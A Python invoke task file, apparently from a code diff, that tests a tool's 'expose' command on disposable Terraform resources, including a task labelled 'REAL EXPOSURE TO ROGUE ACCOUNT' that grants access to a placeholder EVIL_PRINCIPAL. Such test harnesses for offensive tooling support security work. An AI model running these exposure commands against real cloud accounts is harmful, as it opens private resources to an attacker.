def list_resources(c):
for service in LIST_SERVICES:
c.run(f"echo '\nListing {service}'", pty=True)
# @exception_handler
# @task(pre=[create_terraform], post=[destroy_terraform])
@task
def expose_dry_run(c):
"""DRY RUN"""
for service in EXPOSE_SERVICES:
c.run(f"{BIN} expose --service {service} --name test-resource-exposure --dry-run", pty=True)
# @exception_handler
# @task(pre=[create_terraform], post=[destroy_terraform])
@task
def expose_undo(c):
"""Test the undo capability, even though we will destroy it after anyway (just to test the capability)"""
c.run(f"echo 'Exposing the Terraform infrastructure to {EVIL_PRINCIPAL}'")
for service in EXPOSE_SERVICES:
c.run(f"{BIN} expose --service {service} --name test-resource-exposure ", pty=True)
c.run(f"echo 'Undoing the exposure to {EVIL_PRINCIPAL} before destroying, just to be extra sure and to test "
f"it out.'")
c.run(f"{BIN} expose --service {service} --name test-resource-exposure --undo", pty=True)
# @exception_handler
# @task(pre=[create_terraform], post=[destroy_terraform])
@task
def expose(c):
"""REAL EXPOSURE TO ROGUE ACCOUNT"""
for service in EXPOSE_SERVICES:
c.run(f"echo 'Exposing the Terraform infrastructure to {EVIL_PRINCIPAL}'")
c.run(f"{BIN} expose --service {service} --name test-resource-exposure", pty=True)
test.add_task(list_resources, "list-resources")
test.add_task(expose_dry_run, "expose-dry-run")
test.add_task(expose_undo, "expose-undo")
test.add_task(expose, "expose")

Some files were not shown because too many files have changed in this diff Show More